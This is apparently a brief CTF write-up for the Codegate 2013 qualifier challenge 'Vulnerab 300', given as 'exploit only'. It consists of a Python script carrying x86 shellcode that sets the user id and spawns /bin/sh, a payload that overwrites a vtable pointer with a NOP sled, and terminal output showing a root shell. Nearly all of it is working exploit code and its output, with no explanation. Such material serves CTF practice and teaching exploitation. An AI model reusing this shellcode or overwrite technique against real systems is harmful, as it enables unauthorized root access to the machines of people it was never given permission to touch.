CTF/2013
Codegate 2013 Qual - Vulnerab 300 (Exploit only)
pwn3r_45
2013. 4. 17. 01:47
Category : Pwnables
|
Summary : arbitrary memory overwrite, vtable
Exploit
#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = "" payload += "-4\n" payload += "\xe4\x91\x04\x08" payload += "\xe8\x91\x04\x08" payload += "\x90"*0x30 payload += shellcode |
root@ubuntu:~/vuln/300# (./exploit.py;cat) | ./8ff953dd97c4405234a04291dee39e0b Input Num : Input Msg : id uid=0(root) gid=0(root) groups=0(root) |